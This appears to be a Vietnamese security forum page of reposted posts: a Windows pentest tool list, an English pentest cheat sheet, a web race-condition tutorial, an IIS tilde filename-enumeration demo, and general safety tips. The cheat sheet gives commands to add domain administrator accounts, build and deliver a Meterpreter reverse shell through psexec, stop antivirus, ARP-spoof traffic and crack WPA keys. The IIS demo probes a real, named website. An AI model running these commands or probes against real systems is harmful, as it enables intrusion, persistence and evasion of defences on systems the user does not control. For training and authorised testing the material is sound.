Trang

[Tool Security] Windows Tools For Penetration Testing

Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system.
HashCheck Shell Extension
The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files).
Netcat
Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
Metasploit Framework
The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
RealVNC Viewer

Remote access software for desktop and mobile platforms.
GetIf
SNMP tool that allows you to collect information about SNMP devices.
Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development.
PuTTY
PuTTY is an SSH and telnet client for the Windows platform.
Pass The Hash Toolkit
The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes.
Cachedump
Recovering Windows Password Cache Entries.
Fport
Identify unknown open ports and their associated applications.
Nbtscan
This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares.
Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Winfo
Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed.
ClearLogs
ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer.
SQLDict
SQLdict is a dictionary attack tool for SQL Server.
PMDump
PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process.
GrabItAll
GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too.
DumpUsers
DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1.
BrowseList
BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading).
Remoxec
Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation).
WMICracker
Brute-force tool for Windows Management Instrumentation (WMI).
Venom
Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled.
SMBAT
The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms.
RPCScan
RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins.
LSASecretsDump
LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window.
SQLPing
SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever.
OAT
The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.
Pwdump7
Extract password hashes from local user accounts.
PsTools
The PsTools package provides a set of command line utilities that allow you to manage local and remote systems.
Incognito
Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators.
DumpSec
DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information.
X-Deep32
X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc.
LC5
Windows password cracker.
Ophcrack
Ophcrack is a free Windows password cracker based on rainbow tables.
SiVuS
SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations.

Nguồn Blog
http://pentestlab.wordpress.com/

Xem Thêm

 

Cheat Sheet For Pentest By AverageSecurityGuy

Mount Shares


# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

# Mount Windows Share on Linux
mount -t cifs //server/share -o username=,password= /mnt/point

Add Administrative Accounts


# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

stdapi_sys_process_execute: Operation failed: 1314


# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

Metasploit: Use custom executable with psexec


# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter 
# session open in multi/handler

Disable Antivirus


# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic


ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK


# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

Create an IP List with Nmap


nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules


for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} 
-w:<wordlist> <password_file> ; done 

Nguồn Blog
http://averagesecurityguy.info/cheat-sheet/ 

Xem Thêm

 

[Tutorial] Race condition attack trên ứng dụng web


Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
Xem xét đoạn code sau của ngân hàng trong việc trừ tiền :

Khi tiến trình 1 đang thực hiện câu lệnh $tongtien = $tongtien – $sotien thì một tiến trình 2 của người A đang đòi rút chèn ngang, lúc này hệ thống sẽ tạm dừng tiến trình 1 đang xử lý để quay sang xử lý tiến trình 2 :

Lúc này khi bắt đầu xử lý tiến trình 2, tổng tiền chưa được cập nhật bởi tiến trình 1 đã tạm dừng. Do đó số tiền trong tk lúc này vẫn là 10000 và sau khi thực hiện xong cả 2 tiến trình thì tổng tiền vẫn là 9990 mặc dù đã rút 2 lần. Như vậy race condition đã xảy ra khi mà 1 tiến trình chèn ngang tiến trình khác trong lúc các tham số vẫn chưa kịp cập nhật.
Ở đây mình tạo 1 đoạn code lấy tiền với khá nhiều việc, làm cho thời gian xử lý nó lên tới tận 1,2s và cố thử rút 8 lần mà chỉ bị trừ 10$
B1, kiểm tra tài khoản ban đầu và xem access log , lúc này ta đang có 10000:

B2, Xử dụng 1 đoạn python để cùng 1 lúc gửi 8 request, mỗi request đều rút 10$ trong cùng 1 thời gian và xem kết quả trả về :
Như vậy sau 10 request, tổng tiền chỉ bị trừ 10$ trong khi đã rút đến 8 lần.
B3. Kiểm tra log file ta thấy 8 request này tới cùng lúc. Và bởi vì server phải đòi hỏi đến 1 giây để xử lý 1 giao dịch, do đó 8 request này đã làm xuất hiện race condition và bị chèn ngang lẫn nhau.


Nguồn Blog
http://antoanthongtin.wordpress.com

Xem Thêm

 

[TUT] - Khai thác lỗi Microsoft IIS tilde character

Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"

Attack details:
Demo trên site http://hp-aptech.edu.vn

Đầu tiên ta sẽ kiểm tra chữ cái đầu tiên trong tên các file hay folder. Nếu chữ cái đó tồn tại thì sẽ nhận được 1 response 404 - File Not Found. Còn nếu không tồn tại chữ cái đó thì sẽ nhận được 1 response 400 - Bad Request

Bắt đầu thử với link sau:
http://hp-aptech.edu.vn/a*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/b*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/c*~1*/.aspx- -> 404 => Có tồn tại
………
http://hp-aptech.edu.vn/f*~1*/.aspx ->400 Bad request=> Không tồn tại

Giờ ta sẽ thử với chữ cái thứ 2:
http://hp-aptech.edu.vn/ca*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cb*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cc*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/co*~1*/.aspx ->404 =>Có tồn tại

Tiếp tục với những chữ cái tiếp theo:
http://hp-aptech.edu.vn/coa*~1*/.aspx -> 400 => Không tồn tại
http://hp-aptech.edu.vn/cob*~1*/.aspx -> 400 => Không tồn tại
...
http://hp-aptech.edu.vn/con*~1*/.aspx -> 404 => Có tồn tại
http://hp-aptech.edu.vn/com*~1*/.aspx -> 404 => Có tồn tại
Cú tiếp tục đoán tiếp nhé
Muốn khai thác thành công kiểu lỗi này phụ thuộc nhiều yếu tố
+Website chạy IIS
+Có khả năng đoán folder,file..-> đoán file thần chưởng
+ Khi mà tìm được folder,file phải có quyền truy cập đến
+Folder,file tìm được có dữ liệu quan trọng
……...
Cụ thể muốn tìm hiểu lỗi này vào đây. Trong đây có tool sẽ giảm thiểu thời gian cho các bạn phải đoán folder,file. Muốn chạy được tool này phải cài java.
http://code.google.com/p/iis-shortname-scanner-poc/

Tut by kakavn_85

Xem Thêm

 

Một số cách kiểm tra độ an toàn của liên kết

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Các liên kết (link) không an toàn xuất hiện ngày càng nhiều trên các trang blog, diễn đàn, mạng xã hội và các trang chia sẻ dữ liệu.

Khả năng ngụy trang của chúng cũng ngày càng trở nên tinh vi hơn. Khi bạn vô tình click vào những link dạng này, bạn có thể sẽ được chuyển đến một trang web chứa virus hoặc mã độc… có thể lây nhiễm vào máy tính và đánh cắp dữ liệu cá nhân của bạn.

Một trong những cách để tránh các mối nguy cơ từ những link dạng này là kiểm tra độ an toàn của nó trước khi click chuột để mở nó. Bài viết sau đây xin giới thiệu đến các bạn một vài cách có thể làm việc này một cách hoàn toàn miễn phí, nhanh chóng và không yêu cầu bạn phải cài đặt thêm bất cứ thứ gì vào máy tính.

1. Xem địa chỉ thực của link ngay trên trình duyệt

Chắc có lẽ bạn đã từng một lần gặp phải một link dạng văn bản liên kết như nhấp vào đây, tải tại đây, download hoặc click here… nhưng khi bấm vào nó thì bạn lại được đưa đến một địa chỉ khác chứ không phải là địa chỉ mà bạn mong muốn. Khi gặp các link thế này, bạn tạm thời đừng click chuột vào nó ngay mà hãy rê chuột lên nó rồi nhìn xuống phía dưới góc trái của trình duyệt web bạn đang sử dụng, địa chỉ thật của nó sẽ hiện ra. Khi đã chắc địa chỉ bạn nhìn thấy là an toàn và đúng là địa chỉ bạn mong muốn thì bạn hãy click vào nó ngược lại thì bạn nên cân nhắc kỹ hoặc tham khảo tiếp các cách sau để kiểm tra độ an toàn của nó.

2. Sử dụng các dịch vụ quét link

Các dịch vụ quét link là những trang web hoặc plug-in cho phép bạn nhập vào địa chỉ URL của một link mà bạn nghi ngờ và kiểm tra độ an toàn của nó. Có rất nhiều dịch vụ miễn phí và đáng tin cậy có thể làm được việc này và URL Void là một trong số đó. URL Voidlà một dịch vụ miễn phí được phát triển bởi công ty NoVirusThanks, nó cho phép bạn phân tích địa chỉ của một website với các bộ máy lưu trữ các tên miền đen (domains blackists) nổi tiếng như Google SafeBrowsing, My Wot, và Norton SafeWeb và nhanh chóng trả về kết quả là độ an toàn của địa chỉ đó.

[Hình: link-an-toan1.jpg]

3. “Soi” địa chỉ thật của link rút gọn

URL Void là một dịch vụ quét link khá tốt. Tuy nhiên nó chỉ có thể quét và kiểm tra địa chỉ URL của link ở dạng đầy đủ, đối với các liên kết dạng rút gọn từ các dịch vụ như bit.ly, ow.ly và tinyurl.com nó thường cho kết quả không chính xác. Đối với những link dạng này, bạn có thể nhờ đến dịch vụ Sucuri.Sucuri sẽ giúp bạn “soi” ra địa chỉ thật của các link rút gọn và sau đó kiểm tra độ an toàn của nó bằng cách bộ máy như Google SafeBrowsing, Norton Safeweb và Phish Tank. Bên cạnh Sucuri, bạn cũng có thể tham khảo một số dịch vụ có khả năng tương tự khác như http://untiny.com, http://urlxray.com...

[Hình: link-an-toan2.jpg]

4. Cách an toàn để sao chép địa chỉ URL của link

Các dịch vụ tương tự như URL Void và Sucuri đều yêu cầu bạn phải nhập (gõ hoặc paste) các địa chỉ URL của link nghi ngờ – nhưng làm thế nào để bạn có thể lấy được một địa chỉ URL của link một cách nhanh chóng và an toàn mà không cần phải mở nó? Rất dễ. Bạn chỉ cần nhấp phải chuột vào link bạn muốn lấy địa chỉ URL rồi chọn Copy Shortcut (đối với IE), Copy Link Location (đối với Firefox) hoặc Copy Link Address (đối với Chrome). Địa chỉ URL sẽ được sao chép vào clipboard ngay sau đó và bạn có thể sử dụng nó để kiểm tra độ an toàn với các dịch vụ trên.

[Hình: link-an-toan3.jpg]

Xem Thêm

 

Cách đơn giản để phát hiện có người sử dụng máy tính của bạn

Có nhiều người sử dụng máy tính không thích đặt mật khẩu cho máy của mình, nhất là khi làm việc ở văn phòng, tuy nhiên điều này cũng gây ra một số rắc rối khi bạn không biết có ai đã sử dụng máy tính của mình lúc đi vắng hay không.


Hoặc giả sử bạn có một đứa em nghịch ngợm hay vài đứa bạn cùng phòng và muốn kiểm tra rằng có ai đã sử dụng máy tính của bạn khi chưa được sự đồng ý. Thật may là Windows và Mac đều có các tính năng giúp bạn kiểm tra những sự đăng nhập trái phép này.

[Hình: Su-dung-1.jpg]

Windows

Trong Windows, bạn có thể kích hoạt tính năng kiểm soát đăng nhập, để nó theo dõi và ghi lại tên tài khoản sử dụng và thời gian mỗi lần đăng nhập vào máy. Để kích hoạt tính năng này, bạn có thể thực hiện theo các bước sau:

[Hình: Su-dung-2.jpg]

Vào Start,"gpedit.msc" trong menu Start và ấn Enter. Sau đó cửa sổ Local Group Policy Editor sẽ hiện ra, trong cây danh sách bên trái, tìm đến Local Computer Policy > Computer Configuration > Windows Settings > Security Settings > Local Policies > Audit Policy.

[Hình: Su-dung-3.jpg]

Trong khung bên phải, kích đúp vào thiết lập Audit logon events, để tùy chỉnh một số thiết lập. Sau khi cửa sổ Audit logon events Properties hiện ra, đánh dấu vào hai lựa chọn Success và Failure, sau đó chọn OK. Lúc này máy tính sẽ kiểm soát và lưu lại tất cả những lần đăng nhập thành công cũng như thất bại (điền sai mật khẩu đăng nhập) vào máy của bạn.

[Hình: Su-dung-4.jpg]

Sau khi đã kích hoạt xong tính năng theo dõi, để có thể xem danh sách thống kê, bạn vào Start gõ vào "Event Viewer" rồi ấn Enter. Cửa sổ Event Viewer sẽ xuất hiện, chọn Windows Logs > Security trong cột bên trái. Hộp thoại Security hiện ra với danh sách các hoạt động trên máy của bạn, bạn sẽ phải để ý đến các hoạt động có Event ID 4624, tương ứng với hoạt động đăng nhập thành công vào máy của bạn.

[Hình: Su-dung-5.jpg]

Bạn có thể kích đúp vào hoạt động đó, để xem thông tin tài khoản đăng nhập, thời gian và một số thông tin khác. Bạn cũng có thể tạo bộ lọc để chỉ hiển thị những hoạt động đăng nhập có Event ID 4624, bằng cách tùy chỉnh trong mục Filter Current Log trên thanh công cụ.

Mac

Trên các máy sử dụng Mac OS, bạn chỉ có thể kiểm tra xem có ai sử dụng máy tính của mình khi bạn rời đi và đang để máy ở chế độ Sleep, nghĩa là nó chỉ lưu lại các hoạt động đánh thức máy tính từ chế độ Sleep. Bạn có thể thực hiện theo các bước sau:

Mở hộp thoại Console bằng cách nhấn Command + Spacebar, hoặc click vào biểu tượng Spotlight và tìm kiếm nó. Gõ từ "wake" vào thanh tìm kiếm, sau đó kéo xuống phần dưới cùng của danh sách, bạn sẽ tìm thấy những hoạt động đăng nhập gần đây nhất.

[Hình: Su-dung-6.jpg]

Một vài thủ thuật đơn giản, nhưng hiểu quả giúp bạn kiểm tra những người sử dụng máy tính của mình khi bạn không ở đó. Việc này khá hữu ích để kiểm soát việc sử dụng máy tính của con cái bạn hoặc các em nhỏ, tuy nhiên trong các trường hợp khác bạn nên đặt một mật khẩu cho máy tính của mình để đảm bảo sự an toàn.

Theo Genk

Xem Thêm

 

Các lỗi HTTP khi truy cập web và cách sửa

Giao thức HTTP viết tắt của cụm từ Hyper Text Transfer Protocol (giao thức truyền siêu văn bản) và nó đã trở thành giao thức mặc định khi bạn sử dụng các trình duyệt để lướt web. Đôi khi bạn gặp các lỗi thông báo khi dùng giao thức HTTP, thường được gọi là HTTP error codes (tạm dịch: mã lỗi HTTP). Mời các bạn theo dõi bài viết để có các nhìn về các mã lỗi này và cách giải quyết.

HTTP Error 500 – Internal Server Error

[Hình: http500error.jpg]

Lỗi này thường do máy chủ nhận thấy có lỗi xảy ra nhưng không thể xác định chính xác lỗi gì và bạn không thể truy cập trang web bị lỗi hoặc tải các tệp tin mà bạn muốn.

Để giải quyết vấn đề này, đầu tiên bạn cần refresh (tạm dịch: "làm tươi") trang web bằng phím F5 hoặc biểu tượng refresh của các trình duyệt. Ở một vài trường hợp thì lỗi này chỉ là lỗi tạm thời và việc refresh trang web có thể giải quyết được. Nếu không được, bạn có thể ghé thăm trang web này sau hoặc báo lại với người quản trị web nếu thấy cần thiết.

HTTP Error 403

Thỉnh thoảng bạn có thể thấy thông điệp HTTP Error 403 – Forbidden, điều này có nghĩa là thông tin hoặc luồng dữ liệu được gửi bởi trình duyệt của máy trạm nhưng máy chủ web từ chối cho truy cập vì một vài lý do.

[Hình: httperror403forbidden.jpg]

Bạn cần kiểm tra lại đường dẫn của website xem đã chính xác chưa, đôi khi thông tin đó được bảo mật bởi người sở hữu website. Bạn có thể gặp thông báo như 401- Not Authorised cũng như thông báo HTTP Error 403 – Forbidden. Cũng có thể lỗi do traqng web bị đóng cửa nên khi bạn truy cập sẽ bị trả về lỗi này.

HTTP Error 503

Có nhiều loại thông báo của lỗi này như “503 Service Temporarily Unavailable” hoặc “503 Service Unavailable”... lỗi này do máy chủ web tạm thời không hoạt động hoặc máy chủ đang bận hoặc đang được bảo trì.

[Hình: httperror503.jpg]

Vấn đề liên quan tới máy chủ nên giải pháp sẽ không có tác dụng từ phía máy trạm, thử refresh lại trang web hoặc báo lại với người quản trị web. Nếu gặp lỗi “Service Unavailable – DNS Failure” có thể modem/Router của bạn có vấn đề, hãy thử khởi động lại chúng.

HTTP Error 400

[Hình: httperror400.jpg]

Khi gặp lỗi “400: Bad Request” hoặc “HTTP Error 400 – Bad Request”, là do yêu cầu gửi từ máy trạm qua trình duyệt web để nạp một trang web nhưng máy chủ web không thể xử lý yêu cầu này.

Giải pháp cho lỗi này gần như không có nhiều ngoài việc kiểm tra lại địa chỉ web hoặc báo lại cho người quản trị để sửa lỗi.

HTTP Error 404

Lỗi chung thường gặp là “HTTP 404 Not Found” , do yêu cầu của máy trạm gửi đến máy chủ khổng thể xử lý giống như lỗi trả về cho người người khi bạn gửi tới một địa chỉ mail bị lỗi từ máy chủ mail.

[Hình: httperror404.jpg]

Có thể máy chủ web không chứa trang web này hoặc các giá trị của DNS (dịch vụ phân giải tên miền) bị lỗi hoặc địa chỉ của trang web này đã bị hỏng. Việc kiểm tra và sửa trang web này cần có sự can thiệp của người quản trị. Ngoài ra, có thể trang web đã được chuyển tới địa chỉ khác nên khi bạn truy cập sẽ gặp lỗi.

HTTP Error 504

[Hình: httperror504.jpg]

Bạn có thể gặp lỗi “HTTP Error 504 – Gateway Timeout” hoặc một vài thông báo tương tự. Lỗi này do máy chủ gặp lỗi khi nhận gói tin phản hồi từ máy chủ xử lý luồng dữ liệu trọng một thời gian nhất định (timeout). Dấu hiệu này cho thấy máy chủ xử lý luồng dữ liệu đang không hoạt động hoặc có thể bị hỏng.

Để giải quyết vấn đề này thì tại máy trạm chỉ có thể refresh hoặc ghé thăm trang web vào dịp khác.

HTTP Error 401

Nếu bạn gặp lỗi "401 Authorization Required" có nghĩa là bạn phải có tài khoản để có thể truy cập vào một trang web nào đó. Nếu bạn không thể truy cập sau khi đã nhập tài khoản thì có nghĩa là bạn gõ sai mật khẩu hoặc tên đăng nhập.

[Hình: httperror401.jpg]

Bạn cần kiểm tra lại địa chỉ xem có sai hay không hoặc nếu trang web không hề yêu cầu đăng nhập để xem thì đây là lỗi từ máy chủ web, bạn nên liên hệ với người quản trị để sửa lỗi này.

HTTP 302

Với lỗi “HTTP Error 302 – Moved temporarily” có nghĩa địa chỉ web đã được di chuyển tạm tới một vị trí khác cũng đồng nghĩa là địa chỉ đã được thay đổi.

[Hình: httperror302.jpg]

Khi địa chỉ web (URL) được chuyển tới vị trí khác thì thông thường webmaster sẽ chuyển hướng nó về địa chỉ mới. Nếu sự chuyển hướng gặp lỗi thì bạn chỉ cần liên hệ webmaster để sửa.

HTTP Error 200

Lỗi này do yêu cầu đã được nhận bởi máy chủ nhưng nó không thể phân phối yêu cầu tới một vài lỗi php trong trang web. Đầu tiên là bạn cần refresh trang web, nếu bộ nhớ của trình duyệt đầy thì bạn có thể gặp lỗi này nên bạn cần dọn sạch bộ nhớ của trình duyệt và kết nối internet lại vì có thể xảy ra lỗi này khi bạn đang sử dụng một kết nối internet chập chờn. Banl có thể rút dây cắm từ modem ra và cắm lại.

[Hình: httperrorcode200.jpg]

Với các thông báo lỗi thường gặp khi bạn sử dụng giao thức HTTP để lướt web phục vụ công việc, học tập ở trên thì các giải pháp đưa ra có thể hữu ích với bạn hoặc những người đang làm quản trị web (webmaster).

Nguồn : CEH

Xem Thêm

 

[Security] Các mức độ cảnh báo An Ninh

Bài này mình giới thiệu các mức độ cảnh báo an ninh, tham khảo dựa trên website của tổ chức phi lợi nhuận Center for Internet Security. Trang chủ: http://www.cisecurity.org.
Link tham khảo: http://msisac.cisecurity.org/alert-level/


Bộ chỉ thị cảnh báo đưa ra mức cảnh báo hiện tại của các hoạt động phá hoại thông qua Internet, chỉ ra những nguy hiểm tiềm ẩn hay có thật. Bộ chỉ thị này có 5 mức.

1.  Mức 1: Low

low

a. Định nghĩa: Mức này chỉ ra cấp độ nguy hiểm thấp. Không có hành động bất thường cần phải quan tâm như những hành động hacking dễ bị phát hiện, những loại virus đã biết, hay những hoạt động phá hoại khác chỉ dừng lại ở mức độ các nguy cơ tiềm ẩn.
b. Mô tả cụ thể:
  • Hoạt động thăm dò, quét hệ thống mạng thông thường.
  • Các loại virus độ nguy hiểm thấp.
c. Hành động xử lí:
  • Tiếp tục các phương pháp bảo vệ thường xuyên bao gồm ứng dụng những security patches của nhà cung cấp và cập nhật antivirus software signature files một cách đều đặn.
  • Tiếp tục giám sát an ninh đều đặn.
  • Đảm bảo nhân viên có được sự đào tạo bài bản về những nguyên tắc an ninh qua Internet.
d. Cảnh báo:
  • Không cần cảnh báo nếu trạng thái vẫn nằm ở mức hiện tại.
  • Thông báo sẽ được thực hiện thông qua website đồng thời với khi mức cảnh báo tăng lên.

2. Mức 2: Guarded

muc 2

a. Định nghĩa: Mức 2 chỉ mức nguy hiểm ở mức độ trung bình của việc hacking, virus xâm nhập tăng hay những hoạt động phá hoại khác. Khả năng tồn tại những hoạt động phá hoại nhưng không có sự exploit đã biết được nhận ra, hoặc những exploit đã biết được nhận ra nhưng không có tác động đáng kể.
Exploit: khai thác lỗi
b. Mô tả cụ thể:
  • Một lỗ hổng nghiêm trọng bị phát hiện nhưng không có sự khai thác.
  • Một lỗ hổng nghiêm trọng bị khai thác nhưng không có tác động đáng kể.
  • Phát hiện loại virus mới với khả năng lan truyền nhanh.
  • Cảnh báo độ đáng tin của việc thăm dò và quét hệ thống mạng.
  • Tấn công đến những hệ thống không quan trọng nhưng không làm mất data.
c. Hành động xử lí:
  • Tiếp tục những hành động đã được đề cập ở mức trước.
  • Nhận diện những hệ thống bị hổng.
  • Bổ sung những Counter-measure (các biện pháp bảo vệ hệ thống) phù hợp để bảo vệ những hệ thống bị hổng.
  • Khi có thể, thực hiện kiểm tra và vá lỗi, thiết lập update anti-virus…trong những lần tiếp sau.
d. Cảnh báo:
  • Thông báo được thực hiện thông qua website ngay khi mức cảnh báo thay đổi.

3. Mức 3: Elevated

muc 3
a. Định nghĩa: Chỉ ra mức nguy hiểm đáng kể do việc hacking, virus hay những hoạt động phá hoại khác tăng lên mà gây hại hệ thống hay làm giảm chất lượng service. Ở mức độ này, có những lổ hỗng đã biết và đang bị khai thác với mức độ phá hủy nhẹ, hay tiềm ẩn nguy cơ gây nguy hiểm cao.
b. Mô tả cụ thể:
  • Một sự khai thác những lỗ hổng nghiêm trọng mà có khả năng gây ra sự hư hỏng đáng kể.
  • Một lổ hổng nghiêm trọng đang bị khai thác và có tác động nhẹ.
  • Gây ảnh hưởng đến an ninh hay các hệ thống quan trọng chứa các thông tin mang tính chất nhạy cảm.
  • Làm hại những hệ thống quan trọng, chứa những thông tin không mang tính chất nhạy cảm.
  • Virus lan truyền nhanh thông qua Internet tác động đến network traffic.
  • Một cuộc tấn công DDoS (Distributes Denial of Service)
c. Hành động xử lí:
  • Tiếp tục những hành động đã đề cập ở mức trước.
  • Nhận diện những hệ thống bị hổng.
  • Tăng cường giám sát các hệ thống quan trọng.
  • Bổ sung ngay những counter-measure phù hợp để bảo vệ những hệ thống quan trọng bị hổng.
  • Khi có thể, thực hiện kiểm tra, đưa vào những bản vá, cài đặt anti-virus updates, …càng sớm càng tốt.
d. Cảnh báo:
  • Cảnh báo được đưa ra thông qua đường email riêng của tổ chức, đơn vị hay điện thoại trực tiếp khi mức cảnh báo được đưa lên mức độ màu vàng (hoặc Elevated).
  • Cảnh báo thông qua website được thực hiện ngay khi mức cảnh báo thay đổi.

4. Mức 4: High

muc 4
a. Định nghĩa: Mức này chỉ ra mức độ nguy hiểm cao của việc hacking, virus, hay các hoạt động phá hoạt thông qua Internet tăng lên, mà chúng nhắm tới hay phá hủy những cấu trúc hạ tầng lõi dẫn đến ngừng dịch vụ, làm hại hệ thống hay làm hại những cấu trúc hạ tầng quan trọng. Ở mức độ này, những lỗ hổng bị khai thác ở mức độ phá hủy cao, hay khả năng cao gây ra mức độ phá hủy nghiêm trọng.
b. Mô tả cụ thể:
  • Một sự khai thác lỗ hổng nghiêm trọng mà có khả năng gây ra sự phá hủy nghiêm trọng.
  • Một lỗ hổng bị khai thác và gây ra tác động đáng kể.
  • Kẻ tấn công đã giành được quyền quản trị trên hệ thống bị xâm nhập.
  • Nhiều virus có khả năng phá hủy tấn công.
  • Nhiều cuộc tấn công DoS chống lại những dịch vụ hạ tầng quan trọng.
c. Hành động xử lí:
  • Tiếp tục những hành động đã được đề cập ở các mức độ trước.
  • Giám sát sít sao các công cụ security bao gồm firewall, web log files, anti-virus gateway, system log files,…cùng với những hành động bất thường.
  • Xem xét giới hạn hay gỡ những kết nối đến những mạng ngoài ít quan trọng như Internet.
  • Xem xét tách những mạng bên trong quan trọng, ít nhiệm vụ, để giới hạn hay giảm khả năng việc bất ngờ xảy ra.
  • Xem xét sử dụng những phương pháp truyền thông thay thế như phone, fax hay radio thay cho email hay những phương pháp truyền thông điện tử khác.
